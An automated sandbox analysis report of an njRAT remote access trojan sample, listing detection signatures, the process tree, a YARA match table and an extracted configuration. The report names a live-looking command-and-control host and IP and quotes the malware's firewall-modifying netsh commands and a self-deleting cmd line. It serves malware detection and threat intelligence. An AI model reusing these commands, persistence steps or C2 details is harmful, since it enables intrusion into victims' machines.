Windows Analysis Report
ESjy0irMIn.exe

Overview

General Information

Sample Name: ESjy0irMIn.exe
Original Sample Name: 536018D01EE05BC37064C480178E2BF8.exe
Analysis ID: 1336857
MD5: 536018d01ee05bc37064c480178e2bf8
SHA1: 1d21d2d4f21fa7a19cad7e69c8c143bebc9ba7fd
SHA256: a9ea7800b0f50505268b058f14a23dbe4cf6c0f134681a68dce7429b9df8d88b
Tags: exe, njrat, RAT

Detection

Njrat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
.NET source code contains potential unpacker
Drops script or batch files to the startup folder
Uses dynamic DNS services
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • ESjy0irMIn.exe (PID: 6720 cmdline: C:\Users\user\Desktop\ESjy0irMIn.exe MD5: 536018D01EE05BC37064C480178E2BF8)
    • dotNetFx40_Client_setup.exe (PID: 7084 cmdline: "C:\ProgramData\dotNetFx40_Client_setup.exe" MD5: 61446FDD76788229D3EBAEABE84DF38C)
      • Setup.exe (PID: 7232 cmdline: C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web MD5: 006F8A615020A4A17F5E63801485DF46)
        • WINWORD.EXE (PID: 7904 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
          • splwow64.exe (PID: 8048 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
        • WINWORD.EXE (PID: 6792 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • essam@sasa2023.exe (PID: 7172 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
      • netsh.exe (PID: 7392 cmdline: netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7492 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • essam@sasa2023.exe (PID: 7564 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
    • essam@sasa2023.exe (PID: 7648 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
  • cleanup
Name: NjRAT
Description: RedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives." It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
Attribution:
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Install Dir": "AppData", "Install Name": "idlll.exe", "Host": "bmw2022.ddns.net", "Port": "", "Mutex": "5552", "Registry Value": "7968e3cc8ecdfdd08a129deabeee4932", "Campaign ID": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Version": "TXlCb3Q=", "Network Seprator": "0.7d"}
Source | Rule | Description | Author | Strings
00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x14867:$a1: get_Registry
  • 0x2d49f:$a1: get_Registry
  • 0x3741b:$a1: get_Registry
  • 0x15c18:$a2: SEE_MASK_NOZONECHECKS
  • 0x2e850:$a2: SEE_MASK_NOZONECHECKS
  • 0x387cc:$a2: SEE_MASK_NOZONECHECKS
  • 0x15a28:$a3: Download ERROR
  • 0x2e660:$a3: Download ERROR
  • 0x385dc:$a3: Download ERROR
  • 0x15d50:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x2e988:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x38904:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x15cf0:$a5: netsh firewall delete allowedprogram "
  • 0x2e928:$a5: netsh firewall delete allowedprogram "
  • 0x388a4:$a5: netsh firewall delete allowedprogram "
0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | njrat1 | Identify njRat | Brian Wallace @botnet_hunter
  • 0x15c48:$a1: netsh firewall add allowedprogram
  • 0x2e880:$a1: netsh firewall add allowedprogram
  • 0x387fc:$a1: netsh firewall add allowedprogram
  • 0x15c18:$a2: SEE_MASK_NOZONECHECKS
  • 0x2e850:$a2: SEE_MASK_NOZONECHECKS
  • 0x387cc:$a2: SEE_MASK_NOZONECHECKS
  • 0x15dd8:$b1: [TAP]
  • 0x2ea10:$b1: [TAP]
  • 0x3898c:$b1: [TAP]
  • 0x15d50:$c3: cmd.exe /c ping
  • 0x2e988:$c3: cmd.exe /c ping
  • 0x38904:$c3: cmd.exe /c ping
0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x15c18:$reg: SEE_MASK_NOZONECHECKS
  • 0x2e850:$reg: SEE_MASK_NOZONECHECKS
  • 0x387cc:$reg: SEE_MASK_NOZONECHECKS
  • 0x15a04:$msg: Execute ERROR
  • 0x15a64:$msg: Execute ERROR
  • 0x2e63c:$msg: Execute ERROR
  • 0x2e69c:$msg: Execute ERROR
  • 0x385b8:$msg: Execute ERROR
  • 0x38618:$msg: Execute ERROR
  • 0x15d50:$ping: cmd.exe /c ping 0 -n 2 & del
  • 0x2e988:$ping: cmd.exe /c ping 0 -n 2 & del
  • 0x38904:$ping: cmd.exe /c ping 0 -n 2 & del
(8 further entries not shown)

Source | Rule | Description | Author | Strings
11.2.essam@sasa2023.exe.4cc0000.5.unpack | JoeSecurity_Njrat | Yara detected Njrat | Joe Security
11.2.essam@sasa2023.exe.4cc0000.5.unpack | Windows_Trojan_Njrat_30f3c220 | unknown | unknown
  • 0x3967:$a1: get_Registry
  • 0x4d18:$a2: SEE_MASK_NOZONECHECKS
  • 0x4b28:$a3: Download ERROR
  • 0x4e50:$a4: cmd.exe /c ping 0 -n 2 & del "
  • 0x4df0:$a5: netsh firewall delete allowedprogram "
11.2.essam@sasa2023.exe.4cc0000.5.unpack | CN_disclosed_20180208_c | Detects malware from disclosed CN malware set | Florian Roth
  • 0x4e50:$x1: cmd.exe /c ping 0 -n 2 & del "
  • 0x4a22:$s1: winmgmts:\\.\root\SecurityCenter2
  • 0x4b4a:$s3: Executed As
  • 0x41b3:$s5: Stub.exe
  • 0x4b28:$s6: Download ERROR
  • 0x49e4:$s8: Select * From AntiVirusProduct
11.2.essam@sasa2023.exe.4cc0000.5.unpack | njrat1 | Identify njRat | Brian Wallace @botnet_hunter
  • 0x4d48:$a1: netsh firewall add allowedprogram
  • 0x4d18:$a2: SEE_MASK_NOZONECHECKS
  • 0x4ed8:$b1: [TAP]
  • 0x4e50:$c3: cmd.exe /c ping
11.2.essam@sasa2023.exe.4cc0000.5.unpack | Njrat | detect njRAT in memory | JPCERT/CC Incident Response Group
  • 0x4d18:$reg: SEE_MASK_NOZONECHECKS
  • 0x4b04:$msg: Execute ERROR
  • 0x4b64:$msg: Execute ERROR
  • 0x4e50:$ping: cmd.exe /c ping 0 -n 2 & del
(28 further entries not shown)

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\ProgramData\essam@sasa2023.exe, ProcessId: 7172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js
No Snort rule has matched

AV Detection

Source: C:\ProgramData\essam@sasa2023.exe | Avira: detection malicious, Label: HEUR/AGEN.1305400
Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack | Malware Configuration Extractor: Njrat {"Install Dir": "AppData", "Install Name": "idlll.exe", "Host": "bmw2022.ddns.net", "Port": "", "Mutex": "5552", "Registry Value": "7968e3cc8ecdfdd08a129deabeee4932", "Campaign ID": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Version": "TXlCb3Q=", "Network Seprator": "0.7d"}
Source: ESjy0irMIn.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR
Source: ESjy0irMIn.exe | Avira: detected
Source: C:\ProgramData\essam@sasa2023.exe | ReversingLabs: Detection: 79%
Source: ESjy0irMIn.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\essam@sasa2023.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00017C12 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,DecryptFileW,GetLastError,2_2_00017C12
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001751D CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,2_2_0001751D
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D98114 CryptDecodeObject,SetLastError,4_2_69D98114
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D980D5 CryptMsgGetParam,SetLastError,4_2_69D980D5
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D98094 CryptMsgGetAndVerifySigner,4_2_69D98094
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D98083 CryptQueryObject,4_2_69D98083
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D980A5 CryptHashPublicKeyInfo,SetLastError,4_2_69D980A5
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DB17D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_69DB17D1
Source: ESjy0irMIn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1033\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1025\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1028\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1030\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1031\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1029\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1036\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1035\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1032\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1038\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1037\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1040\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1041\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1042\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1044\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1043\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1046\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1045\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1055\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1053\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2052\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1049\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3082\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2070\eula.rtf
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3076\eula.rtf
Source: C:\ProgramData\essam@sasa2023.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txt
Source: ESjy0irMIn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sqmapi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762753670.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762660238.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762608912.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, sqmapi.dll.2.dr
Source: Binary string: SetupEngine.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, SetupEngine.dll.2.dr
Source: Binary string: boxstub.pdb source: ESjy0irMIn.exe, dotNetFx40_Client_setup.exe.0.dr
Source: Binary string: SetupUtility.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
Source: Binary string: Setup.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe, 00000004.00000000.1763277251.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe.2.dr
Source: Binary string: SetupResources.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
Source: Binary string: SetupUi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_000192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_000192BB
Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0001A7B1
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A88097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_69A88097
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A74281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_69A74281
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D85B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_69D85B82
Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D8410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_69D8410A

Networking

Source: unknown | DNS query: name: bmw2022.ddns.net
Source: Malware configuration extractor | URLs: bmw2022.ddns.net
Source: Joe Sandbox View | ASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
Source: global traffic | TCP traffic: 192.168.2.4:49734 -> 156.196.162.149:5552
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: Setup.exe, 00000004.00000003.1785674424.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000003.1789361376.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000003.1785067894.0000000000C68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.micra
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: ESjy0irMIn.exe, 00000000.00000002.1752276948.00000000023B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.dr | String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
